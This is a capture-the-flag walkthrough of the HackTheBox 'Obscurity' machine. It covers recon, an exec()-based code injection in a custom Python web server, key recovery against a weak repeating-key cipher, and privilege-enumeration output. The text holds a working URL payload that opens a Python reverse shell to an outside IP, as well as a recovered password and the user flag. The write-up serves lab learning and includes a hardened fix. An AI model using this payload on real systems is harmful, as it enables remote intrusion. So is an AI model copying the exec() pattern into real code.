HackTheBox Obscurity
Let's start with recon, using nmap.
```
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 00:54 EST
Nmap scan report for 10.10.10.168
Host is up (0.31s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 33:d3:9a:0d:97:2c:54:20:e1:b0:17:34:f4:ca:70:1b (RSA)
|   256 f6:8b:d5:73:97:be:52:cb:12:ea:8b:02:7c:34:a3:d7 (ECDSA)
|_  256 e8:df:55:78:76:85:4b:7b:dc:70:6a:fc:40:cc:ac:9b (ED25519)
80/tcp   closed http
8080/tcp open   http-proxy BadHTTPServer
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Fri, 06 Dec 2019 05:55:37
|     Server: BadHTTPServer
|     Last-Modified: Fri, 06 Dec 2019 05:55:37
|     Content-Length: 4171
|     Content-Type: text/html
|     Connection: Closed
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>0bscura</title>
|     <meta http-equiv="X-UA-Compatible" content="IE=Edge">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta name="keywords" content="">
|     <meta name="description" content="">
|     <!--
|     Easy Profile Template
|     http://www.templatemo.com/tm-467-easy-profile
|     <!-- stylesheet css -->
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/templatemo-blue.css">
|     </head>
|     <body data-spy="scroll" data-target=".navbar-collapse">
|     <!-- preloader section -->
|     <!--
|     <div class="preloader">
|     <div class="sk-spinner sk-spinner-wordpress">
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Fri, 06 Dec 2019 05:55:38
|     Server: BadHTTPServer
|     Last-Modified: Fri, 06 Dec 2019 05:55:38
|     Content-Length: 4171
|     Content-Type: text/html
|     Connection: Closed
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>0bscura</title>
|     <meta http-equiv="X-UA-Compatible" content="IE=Edge">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta name="keywords" content="">
|     <meta name="description" content="">
|     <!--
|     Easy Profile Template
|     http://www.templatemo.com/tm-467-easy-profile
|     <!-- stylesheet css -->
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/templatemo-blue.css">
|     </head>
|     <body data-spy="scroll" data-target=".navbar-collapse">
|     <!-- preloader section -->
|     <!--
|     <div class="preloader">
|_    <div class="sk-spinner sk-spinner-wordpress">
|_http-server-header: BadHTTPServer
|_http-title: 0bscura
9000/tcp closed cslistener
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.18 seconds
```
Let's try accessing the HTTP service on port 8080.
It looks like a blog page about 0bscura. Scrolling down, we find a clue like this
It seems the box creator wants us to find the Python script SuperSecureServer.py, which sits in some directory. To look for it we can use wfuzz.
```
wfuzz -c -z file,rockyou.txt --hc 404 http://10.10.10.168:8080/FUZZ/SuperSecureServer.py
```
We find the script SuperSecureServer.py in the develop directory.
```python
import socket
import threading
from datetime import datetime
import sys
import os
import mimetypes
import urllib.parse
import subprocess

respTemplate = """HTTP/1.1 {statusNum} {statusCode}
Date: {dateSent}
Server: {server}
Last-Modified: {modified}
Content-Length: {length}
Content-Type: {contentType}
Connection: {connectionType}

{body}
"""
DOC_ROOT = "DocRoot"

CODES = {"200": "OK",
        "304": "NOT MODIFIED",
        "400": "BAD REQUEST", "401": "UNAUTHORIZED", "403": "FORBIDDEN", "404": "NOT FOUND",
        "500": "INTERNAL SERVER ERROR"}

MIMES = {"txt": "text/plain", "css":"text/css", "html":"text/html", "png": "image/png", "jpg":"image/jpg",
        "ttf":"application/octet-stream","otf":"application/octet-stream", "woff":"font/woff", "woff2": "font/woff2",
        "js":"application/javascript","gz":"application/zip", "py":"text/plain", "map": "application/octet-stream"}


class Response:
    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)
        now = datetime.now()
        self.dateSent = self.modified = now.strftime("%a, %d %b %Y %H:%M:%S")
    def stringResponse(self):
        return respTemplate.format(**self.__dict__)

class Request:
    def __init__(self, request):
        self.good = True
        try:
            request = self.parseRequest(request)
            self.method = request["method"]
            self.doc = request["doc"]
            self.vers = request["vers"]
            self.header = request["header"]
            self.body = request["body"]
        except:
            self.good = False

    def parseRequest(self, request):
        req = request.strip("\r").split("\n")
        method,doc,vers = req[0].split(" ")
        header = req[1:-3]
        body = req[-1]
        headerDict = {}
        for param in header:
            pos = param.find(": ")
            key, val = param[:pos], param[pos+2:]
            headerDict.update({key: val})
        return {"method": method, "doc": doc, "vers": vers, "header": headerDict, "body": body}


class Server:
    def __init__(self, host, port):
        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.host, self.port))

    def listen(self):
        self.sock.listen(5)
        while True:
            client, address = self.sock.accept()
            client.settimeout(60)
            threading.Thread(target = self.listenToClient,args = (client,address)).start()

    def listenToClient(self, client, address):
        size = 1024
        while True:
            try:
                data = client.recv(size)
                if data:
                    # Set the response to echo back the recieved data
                    req = Request(data.decode())
                    self.handleRequest(req, client, address)
                    client.shutdown()
                    client.close()
                else:
                    raise error('Client disconnected')
            except:
                client.close()
                return False

    def handleRequest(self, request, conn, address):
        if request.good:
#            try:
#                print(str(request.method) + " " + str(request.doc), end=' ')
#                print("from {0}".format(address[0]))
#            except Exception as e:
#                print(e)
            document = self.serveDoc(request.doc, DOC_ROOT)
            statusNum=document["status"]
        else:
            document = self.serveDoc("/errors/400.html", DOC_ROOT)
            statusNum="400"
        body = document["body"]

        statusCode=CODES[statusNum]
        dateSent = ""
        server = "BadHTTPServer"
        modified = ""
        length = len(body)
        contentType = document["mime"] # Try and identify MIME type from string
        connectionType = "Closed"

        resp = Response(
        statusNum=statusNum, statusCode=statusCode,
        dateSent = dateSent, server = server,
        modified = modified, length = length,
        contentType = contentType, connectionType = connectionType,
        body = body
        )

        data = resp.stringResponse()
        if not data:
            return -1
        conn.send(data.encode())
        return 0

    def serveDoc(self, path, docRoot):
        path = urllib.parse.unquote(path)
        try:
            info = "output = 'Document: {}'" # Keep the output for later debug
            exec(info.format(path)) # This is how you do string formatting, right?
            cwd = os.path.dirname(os.path.realpath(__file__))
            docRoot = os.path.join(cwd, docRoot)
            if path == "/":
                path = "/index.html"
            requested = os.path.join(docRoot, path[1:])
            if os.path.isfile(requested):
                mime = mimetypes.guess_type(requested)
                mime = (mime if mime[0] != None else "text/html")
                mime = MIMES[requested.split(".")[-1]]
                try:
                    with open(requested, "r") as f:
                        data = f.read()
                except:
                    with open(requested, "rb") as f:
                        data = f.read()
                status = "200"
            else:
                errorPage = os.path.join(docRoot, "errors", "404.html")
                mime = "text/html"
                with open(errorPage, "r") as f:
                    data = f.read().format(path)
                status = "404"
        except Exception as e:
            print(e)
            errorPage = os.path.join(docRoot, "errors", "500.html")
            mime = "text/html"
            with open(errorPage, "r") as f:
                data = f.read()
            status = "500"
        return {"body": data, "mime": mime, "status": status}
```
The author does not quite understand the box creator's intent here: in the author's view the script is incomplete, or deliberately not shown in full, since it has no main body, only the classes. One part does stand out, though: the exec call in serveDoc. We may be able to get RCE, but we first need to trace through the script to find the entry point for our command.
Requesting a random directory returns a 404. The author also found a reflected XSS, which at first looked like it might be usable somehow.
However, while trying to develop that XSS, the author noticed something odd: every time we include a ' character, the page returns a connection reset.
At this point the author has two hypotheses: either the intended path is exploiting the XSS but there is a firewall or blacklist in the way, or it is RCE through the directory part of the URL, as suspected from the start after reading SuperSecureServer.py.
It turns out we can get RCE and a reverse shell through that URL input.
```
http://10.10.10.168:8080/';s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.218%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);'
```
We get a reverse shell as www-data; ignore the EOL error message.
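Why a lone ' broke the request while a longer path ran code, shown as an added example (not the box's code and not from the original write-up): serveDoc pastes the URL-decoded path into a Python statement and passes it to exec. The namespace dict, the `marker` variable, the sample paths and the function names are constructed for this demo; `fixed_serve_log` is one way to keep the debug string without exec.

```python
import urllib.parse

# Statement template copied from serveDoc in SuperSecureServer.py.
TEMPLATE = "output = 'Document: {}'"


def vulnerable_serve_log(raw_path):
    """Reproduce serveDoc's pattern: decode the path, paste it into source, exec it.

    The namespace dict is an addition for this demo so that whatever the
    executed text defines can be inspected afterwards.
    """
    path = urllib.parse.unquote(raw_path)
    namespace = {}
    try:
        exec(TEMPLATE.format(path), namespace)
    except SyntaxError:
        # The path closed the string literal and left invalid Python behind.
        return {"result": "syntax-error", "extra": {}}
    except Exception:
        # The path parsed as Python but failed while running.
        return {"result": "runtime-error", "extra": {}}
    extra = {k: v for k, v in namespace.items()
             if k not in ("__builtins__", "output")}
    return {"result": "extra-code-ran" if extra else "ok", "extra": extra}


def fixed_serve_log(raw_path):
    """Hardened form: the path is only ever data, never source text."""
    path = urllib.parse.unquote(raw_path)
    return "Document: {}".format(path)


def alters_literal(raw_path):
    """Log-review check: does the decoded path contain a character that ends or
    changes the single-quoted literal in TEMPLATE (quote, backslash, newline)?"""
    path = urllib.parse.unquote(raw_path)
    return any(ch in path for ch in ("'", "\\", "\n", "\r"))


# Constructed request paths; "marker" is a harmless stand-in for injected code.
SAMPLES = [
    "/index.html",                 # ordinary request
    "/%27",                        # lone quote, URL-encoded
    "/%27%3Bmarker%3D6*7%3B%27",   # quote, statement, quote (all URL-encoded)
]


def run_samples():
    """Return (path, vulnerable result, extra names, flagged, fixed output) rows."""
    rows = []
    for raw in SAMPLES:
        seen = vulnerable_serve_log(raw)
        rows.append((raw, seen["result"], seen["extra"],
                     alters_literal(raw), fixed_serve_log(raw)))
    return rows


if __name__ == "__main__":
    for row in run_samples():
        print(row)
```

Because the server calls urllib.parse.unquote before exec, checking the raw request line for a literal quote is not enough; the check has to run on the decoded path.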
Moving into /home/robert, we can see user.txt.
However, www-data does not have permission to open user.txt; we have to authenticate as robert.
Contents of check.txt
```
Encrypting this file with your key should result in out.txt, make sure your key is correct!
```
Contents of out.txt
```
¦ÚÈêÚÞØÛÝÝ ×ÐÊß ÞÊÚÉæßÝËÚÛÚêÙÉëéÑÒÝÍÐ êÆáÙÞãÒÑÐáÙ¦ÕæØãÊÎÍßÚêÆÝáäè ÎÍÚÎëÑÓäáÛÌ× v
```
Contents of SuperSecureCrypt.py
```python
import sys
import argparse

def encrypt(text, key):
    keylen = len(key)
    keyPos = 0
    encrypted = ""
    for x in text:
        keyChr = key[keyPos]
        newChr = ord(x)
        newChr = chr((newChr + ord(keyChr)) % 255)
        encrypted += newChr
        keyPos += 1
        keyPos = keyPos % keylen
    return encrypted

def decrypt(text, key):
    keylen = len(key)
    keyPos = 0
    decrypted = ""
    for x in text:
        keyChr = key[keyPos]
        newChr = ord(x)
        newChr = chr((newChr - ord(keyChr)) % 255)
        decrypted += newChr
        keyPos += 1
        keyPos = keyPos % keylen
    return decrypted

parser = argparse.ArgumentParser(description='Encrypt with 0bscura\'s encryption algorithm')

parser.add_argument('-i',
                    metavar='InFile',
                    type=str,
                    help='The file to read',
                    required=False)

parser.add_argument('-o',
                    metavar='OutFile',
                    type=str,
                    help='Where to output the encrypted/decrypted file',
                    required=False)

parser.add_argument('-k',
                    metavar='Key',
                    type=str,
                    help='Key to use',
                    required=False)

parser.add_argument('-d', action='store_true', help='Decrypt mode')

args = parser.parse_args()

banner = "################################\n"
banner+= "# BEGINNING #\n"
banner+= "# SUPER SECURE ENCRYPTOR #\n"
banner+= "################################\n"
banner += " ############################\n"
banner += " # FILE MODE #\n"
banner += " ############################"
print(banner)
if args.o == None or args.k == None or args.i == None:
    print("Missing args")
else:
    if args.d:
        print("Opening file {0}...".format(args.i))
        with open(args.i, 'r', encoding='UTF-8') as f:
            data = f.read()

        print("Decrypting...")
        decrypted = decrypt(data, args.k)

        print("Writing to {0}...".format(args.o))
        with open(args.o, 'w', encoding='UTF-8') as f:
            f.write(decrypted)
    else:
        print("Opening file {0}...".format(args.i))
        with open(args.i, 'r', encoding='UTF-8') as f:
            data = f.read()

        print("Encrypting...")
        encrypted = encrypt(data, args.k)

        print("Writing to {0}...".format(args.o))
        with open(args.o, 'w', encoding='UTF-8') as f:
            f.write(encrypted)
```
Contents of passwordreminder.txt
```
´ÑÈÌÉàÙÁÑ鯷¿k
```
We are given a plaintext (check.txt), its encrypted output (out.txt), the script used for the encryption (SuperSecureCrypt.py), and robert's encrypted password (passwordreminder.txt). Let's reverse the process and recover the key so we can decrypt robert's password.
The author wrote the script below to recover the key.
```python
#!/usr/bin/env python3
# Known-plaintext key recovery: out.txt = encrypt(check.txt, key), and encrypt
# adds the key's code points modulo 255, so key[i] = (enc[i] - text[i]) % 255.
# The printed result is the key repeated along the length of the text.
with open('check.txt', 'r', encoding='UTF-8') as f:
    text = f.read()
with open('out.txt', 'r', encoding='UTF-8') as s:
    enc = s.read()

key = ""
for i in range(min(len(text), len(enc))):
    # The modulo covers both cases: enc[i] above text[i], and the wrap-around below it.
    key += chr((ord(enc[i]) - ord(text[i])) % 255)
print(key)
```
The key in use is alexandrovich; let's use SuperSecureCrypt.py to decrypt.
We obtain the password for robert: SecThruObsFTW
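The recovery step above carried through on constructed data, as an added example rather than the author's script or the box's files: it goes a little further than the write-up by exercising the modulo-255 wrap-around and by reducing the repeated keystream to its shortest period. KEY, KNOWN_PLAIN, SECRET and the helper names are constructed for this demo; the add/subtract arithmetic is the one in SuperSecureCrypt.py.

```python
def encrypt(text, key):
    """Same arithmetic as SuperSecureCrypt.py: add key code points modulo 255."""
    return "".join(chr((ord(c) + ord(key[i % len(key)])) % 255)
                   for i, c in enumerate(text))


def decrypt(text, key):
    """Inverse of encrypt: subtract key code points modulo 255."""
    return "".join(chr((ord(c) - ord(key[i % len(key)])) % 255)
                   for i, c in enumerate(text))


def recover_keystream(plain, cipher):
    """Known-plaintext step: each key character is (cipher - plain) mod 255."""
    return "".join(chr((ord(c) - ord(p)) % 255) for p, c in zip(plain, cipher))


def shortest_period(stream):
    """Reduce 'keykeykey...' to 'key': the smallest n with stream[i] == stream[i-n]."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - n] for i in range(n, len(stream))):
            return stream[:n]
    return stream


def recover_key(plain, cipher):
    """Full recovery: keystream from the known pair, then its shortest period."""
    return shortest_period(recover_keystream(plain, cipher))


def wrapped_positions(plain, cipher):
    """Count positions where the sum passed 255 and wrapped (cipher < plain)."""
    return sum(1 for p, c in zip(plain, cipher) if ord(c) < ord(p))


# Constructed values (not the box's files). The Latin-1 letters force wrap-around.
KEY = "constructedkey"
KNOWN_PLAIN = ("Constructed sample: r\u00e9sum\u00e9, na\u00efve, fa\u00e7ade. "
               "Both sides know this text.")
SECRET = "constructed-secret-value"

CIPHER_CHECK = encrypt(KNOWN_PLAIN, KEY)    # plays the role of out.txt
CIPHER_SECRET = encrypt(SECRET, KEY)        # plays the role of passwordreminder.txt


if __name__ == "__main__":
    key = recover_key(KNOWN_PLAIN, CIPHER_CHECK)
    print("recovered key:", key)
    print("wrapped positions:", wrapped_positions(KNOWN_PLAIN, CIPHER_CHECK))
    print("decrypted secret:", decrypt(CIPHER_SECRET, key))
```

One known plaintext/ciphertext pair at least as long as the key exposes the whole key, and with it every other file encrypted under that key.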
Let's log in over SSH.
user.txt : e4493782066b55fe2755708736ada2d7
Here is the output of LinEnum.sh
[-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 127.0.0.53:53 0.0.0.0:* - ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 77788 8828 ? Ss 00:56 0:04 /sbin/init maybe-ubiquity root 2 0.0 0.0 0 0 ? S 00:56 0:00 [kthreadd] root 4 0.0 0.0 0 0 ? I< 00:56 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? I< 00:56 0:00 [mm_percpu_wq] root 7 0.0 0.0 0 0 ? S 00:56 0:09 [ksoftirqd/0] root 8 0.0 0.0 0 0 ? I 00:56 0:11 [rcu_sched] root 9 0.0 0.0 0 0 ? I 00:56 0:00 [rcu_bh] root 10 0.0 0.0 0 0 ? S 00:56 0:00 [migration/0] root 11 0.0 0.0 0 0 ? S 00:56 0:00 [watchdog/0] root 12 0.0 0.0 0 0 ? S 00:56 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S 00:56 0:00 [cpuhp/1] root 14 0.0 0.0 0 0 ? S 00:56 0:00 [watchdog/1] root 15 0.0 0.0 0 0 ? S 00:56 0:00 [migration/1] root 16 0.0 0.0 0 0 ? S 00:56 0:09 [ksoftirqd/1] root 18 0.0 0.0 0 0 ? I< 00:56 0:00 [kworker/1:0H] root 19 0.0 0.0 0 0 ? S 00:56 0:00 [kdevtmpfs] root 20 0.0 0.0 0 0 ? I< 00:56 0:00 [netns] root 21 0.0 0.0 0 0 ? S 00:56 0:00 [rcu_tasks_kthre] root 22 0.0 0.0 0 0 ? S 00:56 0:00 [kauditd] root 24 0.0 0.0 0 0 ? S 00:56 0:00 [khungtaskd] root 25 0.0 0.0 0 0 ? S 00:56 0:00 [oom_reaper] root 26 0.0 0.0 0 0 ? I< 00:56 0:00 [writeback] root 27 0.0 0.0 0 0 ? S 00:56 0:00 [kcompactd0] root 28 0.0 0.0 0 0 ? SN 00:56 0:00 [ksmd] root 29 0.0 0.0 0 0 ? SN 00:56 0:00 [khugepaged] root 30 0.0 0.0 0 0 ? I< 00:56 0:00 [crypto] root 31 0.0 0.0 0 0 ? I< 00:56 0:00 [kintegrityd] root 32 0.0 0.0 0 0 ? I< 00:56 0:00 [kblockd] root 33 0.0 0.0 0 0 ? I< 00:56 0:00 [ata_sff] root 34 0.0 0.0 0 0 ? I< 00:56 0:00 [md] root 35 0.0 0.0 0 0 ? I< 00:56 0:00 [edac-poller] root 36 0.0 0.0 0 0 ? I< 00:56 0:00 [devfreq_wq] root 37 0.0 0.0 0 0 ? I< 00:56 0:00 [watchdogd] root 41 0.0 0.0 0 0 ? S 00:56 0:00 [kswapd0] root 42 0.0 0.0 0 0 ? 
I< 00:56 0:00 [kworker/u257:0] root 43 0.0 0.0 0 0 ? S 00:56 0:00 [ecryptfs-kthrea] root 85 0.0 0.0 0 0 ? I< 00:56 0:00 [kthrotld] root 86 0.0 0.0 0 0 ? I< 00:56 0:00 [acpi_thermal_pm] root 87 0.0 0.0 0 0 ? S 00:56 0:00 [scsi_eh_0] root 88 0.0 0.0 0 0 ? I< 00:56 0:00 [scsi_tmf_0] root 89 0.0 0.0 0 0 ? S 00:56 0:00 [scsi_eh_1] root 90 0.0 0.0 0 0 ? I< 00:56 0:00 [scsi_tmf_1] root 96 0.0 0.0 0 0 ? I< 00:56 0:00 [ipv6_addrconf] root 105 0.0 0.0 0 0 ? I< 00:56 0:00 [kstrp] root 122 0.0 0.0 0 0 ? I< 00:56 0:00 [charger_manager] root 160 0.0 0.0 0 0 ? I 00:56 0:07 [kworker/0:2] root 174 0.0 0.0 0 0 ? I< 00:56 0:00 [mpt_poll_0] root 175 0.0 0.0 0 0 ? I< 00:56 0:00 [mpt/0] root 214 0.0 0.0 0 0 ? I< 00:56 0:00 [kworker/0:1H] root 215 0.0 0.0 0 0 ? S 00:56 0:00 [scsi_eh_2] root 216 0.0 0.0 0 0 ? I< 00:56 0:00 [scsi_tmf_2] root 217 0.0 0.0 0 0 ? I< 00:56 0:00 [ttm_swap] root 218 0.0 0.0 0 0 ? S 00:56 0:00 [irq/16-vmwgfx] root 221 0.0 0.0 0 0 ? I< 00:56 0:00 [kworker/1:1H] root 288 0.0 0.0 0 0 ? I< 00:56 0:00 [raid5wq] root 334 0.0 0.0 0 0 ? S 00:56 0:00 [jbd2/sda2-8] root 335 0.0 0.0 0 0 ? I< 00:56 0:00 [ext4-rsv-conver] root 398 0.0 1.2 152852 36708 ? S<s 00:56 0:03 /lib/systemd/systemd-journald root 405 0.0 0.0 0 0 ? I< 00:56 0:00 [iscsi_eh] root 412 0.0 0.0 0 0 ? I< 00:56 0:00 [ib-comp-wq] root 413 0.0 0.0 0 0 ? I< 00:56 0:00 [ib_mcast] root 414 0.0 0.0 0 0 ? I< 00:56 0:00 [ib_nl_sa_wq] root 418 0.0 0.0 0 0 ? I< 00:56 0:00 [rdma_cm] root 419 0.0 0.1 46096 5072 ? Ss 00:56 0:01 /lib/systemd/systemd-udevd root 429 0.0 0.0 97708 1716 ? Ss 00:56 0:00 /sbin/lvmetad -f root 453 0.0 0.0 0 0 ? I 00:56 0:05 [kworker/1:2] root 466 0.0 0.0 0 0 ? S< 00:56 0:00 [loop0] root 468 0.0 0.0 0 0 ? S< 00:56 0:00 [loop1] systemd+ 530 0.0 0.1 141928 3136 ? Ssl 00:56 0:00 /lib/systemd/systemd-timesyncd root 531 0.0 0.3 88224 9488 ? Ss 00:56 0:00 /usr/bin/VGAuthService root 595 0.0 0.3 117980 11376 ? Ss 00:56 0:06 /usr/bin/vmtoolsd systemd+ 761 0.0 0.1 71848 5260 ? 
Ss 00:56 0:00 /lib/systemd/systemd-networkd systemd+ 815 0.0 0.1 70628 5324 ? Ss 00:56 0:00 /lib/systemd/systemd-resolved root 959 0.0 0.1 70588 5948 ? Ss 00:56 0:00 /lib/systemd/systemd-logind daemon 963 0.0 0.0 28332 2400 ? Ss 00:56 0:00 /usr/sbin/atd -f message+ 965 0.0 0.1 50388 4972 ? Ss 00:56 0:02 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only root 996 0.0 0.0 110544 2092 ? Ssl 00:56 0:00 /usr/sbin/irqbalance --foreground root 1002 0.0 0.5 169096 17072 ? Ssl 00:56 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 1003 0.0 0.2 286460 6976 ? Ssl 00:56 0:00 /usr/lib/accountsservice/accounts-daemon syslog 1010 0.0 0.1 263036 5268 ? Ssl 00:56 0:00 /usr/sbin/rsyslogd -n root 1019 0.0 0.1 30028 3228 ? Ss 00:56 0:00 /usr/sbin/cron -f root 1020 0.0 0.0 678780 1832 ? Ssl 00:56 0:04 /usr/bin/lxcfs /var/lib/lxcfs/ root 1021 0.0 0.7 927332 22396 ? Ssl 00:56 0:02 /usr/lib/snapd/snapd root 1056 0.0 0.6 185944 20076 ? Ssl 00:56 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal root 1076 0.0 0.1 20048 3600 ? S 00:56 0:00 /bin/bash /var/SuperSecureServer/keepalive.sh root 1134 0.0 0.0 14888 1856 ? Ss 00:56 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux root 1186 0.0 0.2 291448 7268 ? Ssl 00:56 0:01 /usr/lib/policykit-1/polkitd --no-debug root 1225 0.0 0.2 72296 6484 ? Ss 00:56 0:00 /usr/sbin/sshd -D www-data 1392 0.0 0.1 20048 3600 tty1 Ss 00:56 0:00 /bin/bash /var/SuperSecureServer/init.sh www-data 1393 7.8 1.0 1216288 30508 tty1 Sl 00:56 17:07 /usr/bin/python3 /var/SuperSecureServer/main.py www-data 9091 0.0 0.1 20180 3788 pts/14 Ss 03:11 0:00 /bin/bash www-data 9587 0.0 0.3 35188 9500 pts/14 S+ 03:11 0:00 python3 www-data 20461 0.0 0.1 20180 3884 pts/15 Ss+ 03:14 0:00 /bin/bash root 23129 0.0 0.2 107984 7060 ? Ss 01:07 0:00 sshd: robert [priv] robert 24318 0.0 0.2 76640 7472 ? 
Ss 01:07 0:00 /lib/systemd/systemd --user robert 24330 0.0 0.0 111772 2416 ? S 01:07 0:00 (sd-pam) robert 24722 0.0 0.1 107984 3536 ? S 01:07 0:00 sshd: robert@pts/0 robert 24737 0.0 0.1 21460 5224 pts/0 Ss+ 01:07 0:00 -bash root 48269 0.0 0.0 0 0 ? I 04:11 0:00 [kworker/u256:2] root 48610 0.0 0.2 107984 7184 ? Ss 04:11 0:00 sshd: robert [priv] robert 49091 0.0 0.1 107984 3504 ? S 04:11 0:00 sshd: robert@pts/19 robert 49110 0.0 0.1 21592 5320 pts/19 Ss 04:11 0:00 -bash root 50224 0.0 0.0 0 0 ? I 03:44 0:00 [kworker/u256:1] www-data 59111 0.0 0.1 20180 3948 pts/16 Ss+ 03:26 0:00 /bin/bash www-data 60607 0.0 0.0 4628 800 tty1 S 03:26 0:00 /bin/sh -i www-data 62613 0.0 0.0 4628 1632 tty1 S 04:13 0:00 /bin/sh -i root 64456 0.0 0.0 0 0 ? I 04:13 0:00 [kworker/0:1] www-data 66068 0.0 0.0 6180 740 tty1 S 04:14 0:00 cat /tmp/f www-data 67117 0.0 0.0 4628 1688 tty1 S 04:14 0:00 /bin/sh -i root 67120 0.0 0.1 62224 4140 pts/19 S+ 04:14 0:00 sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py root 67121 0.0 0.4 41052 13296 pts/19 S+ 04:14 0:00 /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py root 69540 0.0 0.0 0 0 ? I 04:16 0:00 [kworker/1:0] root 70607 0.0 0.0 0 0 ? I 03:56 0:00 [kworker/u256:0] root 70976 0.0 0.2 107984 7180 ? Ss 02:53 0:00 sshd: robert [priv] robert 71970 0.0 0.1 107984 3544 ? 
S 02:54 0:00 sshd: robert@pts/11 robert 72057 0.0 0.1 21460 5296 pts/11 Ss+ 02:54 0:00 -bash www-data 74786 0.0 0.0 4628 1648 tty1 S 01:45 0:00 /bin/sh -i www-data 74844 0.0 0.1 20180 3924 pts/2 Ss 01:48 0:00 /bin/bash www-data 74896 0.0 0.1 46836 5748 tty1 S 01:50 0:00 ssh robert@127.0.0.1 www-data 75119 0.0 0.0 4628 800 tty1 S 01:55 0:00 sh -c ping 10.10.15.130 www-data 75120 0.0 0.0 15100 1104 tty1 S 01:55 0:00 ping 10.10.15.130 root 75579 0.0 0.1 62224 4200 pts/19 S+ 04:20 0:00 sudo -u robert ssh -R 1337:localhost:22 root@10.10.15.50 robert 75580 0.0 0.1 46836 5792 pts/19 S+ 04:20 0:00 ssh -R 1337:localhost:22 root@10.10.15.50 www-data 76118 0.0 0.0 4628 1656 tty1 S 01:59 0:00 /bin/sh -i www-data 77487 0.0 0.0 4628 1648 pts/2 S+ 02:03 0:00 /bin/sh -i www-data 79380 0.0 0.1 20180 3768 pts/3 Ss+ 02:07 0:00 /bin/bash www-data 79564 0.0 0.3 38956 9684 tty1 S 04:25 0:00 python3 /tmp/putt.py www-data 79565 0.0 0.0 4628 772 pts/17 Ss+ 04:25 0:00 /bin/sh www-data 80153 0.0 0.3 38956 9400 tty1 S 02:08 0:00 python3 -c import pty; pty.spawn("/bin/sh") www-data 80155 0.0 0.0 4628 876 pts/4 Ss+ 02:08 0:00 /bin/sh root 80509 0.0 0.2 105868 7212 ? Ss 04:30 0:00 sshd: robert [priv] robert 80668 0.0 0.1 108168 5560 ? S 04:30 0:00 sshd: robert@pts/18 robert 80671 0.0 0.1 21460 5336 pts/18 Ss+ 04:30 0:00 -bash root 81627 0.0 0.2 105684 7088 ? Ss 04:31 0:00 sshd: robert [priv] robert 81722 0.1 0.1 107984 5616 ? S 04:31 0:00 sshd: robert@pts/20 robert 81726 0.2 0.2 22252 5992 pts/20 Ss+ 04:31 0:00 -bash root 82474 0.0 0.2 105684 6992 ? Ss 04:32 0:00 sshd: robert [priv] robert 87211 0.0 0.1 107984 5716 ? S 04:32 0:00 sshd: robert@pts/21 robert 87215 0.0 0.1 21460 5284 pts/21 Ss+ 04:32 0:00 -bash root 87254 0.0 0.2 105684 6964 ? Ss 04:32 0:00 sshd: robert [priv] robert 87353 0.0 0.1 107984 5420 ? 
S 04:32 0:00 sshd: robert@pts/22 robert 87362 0.0 0.1 21460 5320 pts/22 Ss 04:32 0:00 -bash root 88024 0.0 0.1 62224 4036 tty1 S 04:33 0:00 sudo python3 BetteSSH/BetterSSH.py www-data 88325 0.0 0.1 20180 3776 pts/5 Ss 02:17 0:00 /bin/bash www-data 88445 0.0 0.0 4628 832 tty1 S+ 04:34 0:00 /bin/sh -i www-data 88473 0.0 0.0 6316 736 pts/5 S+ 02:17 0:00 cat www-data 88905 0.0 0.1 20180 3904 pts/6 Ss+ 02:18 0:00 /bin/bash root 88936 0.0 0.0 0 0 ? I 04:34 0:00 [kworker/u256:3] root 89081 0.0 0.0 6176 792 ? S 04:35 0:00 sleep 30 robert 89343 0.0 0.1 12512 3988 pts/22 S+ 04:35 0:00 /bin/bash ./LinEnum.sh robert 89344 0.0 0.1 12512 3052 pts/22 S+ 04:35 0:00 /bin/bash ./LinEnum.sh robert 89345 0.0 0.0 6180 812 pts/22 S+ 04:35 0:00 tee -a robert 89573 0.0 0.0 12512 2796 pts/22 S+ 04:35 0:00 /bin/bash ./LinEnum.sh robert 89574 0.0 0.1 38372 3584 pts/22 R+ 04:35 0:00 ps aux www-data 91233 0.0 0.1 20180 3908 pts/12 Ss+ 02:54 0:00 /bin/bash www-data 99430 0.0 0.1 20180 3896 pts/7 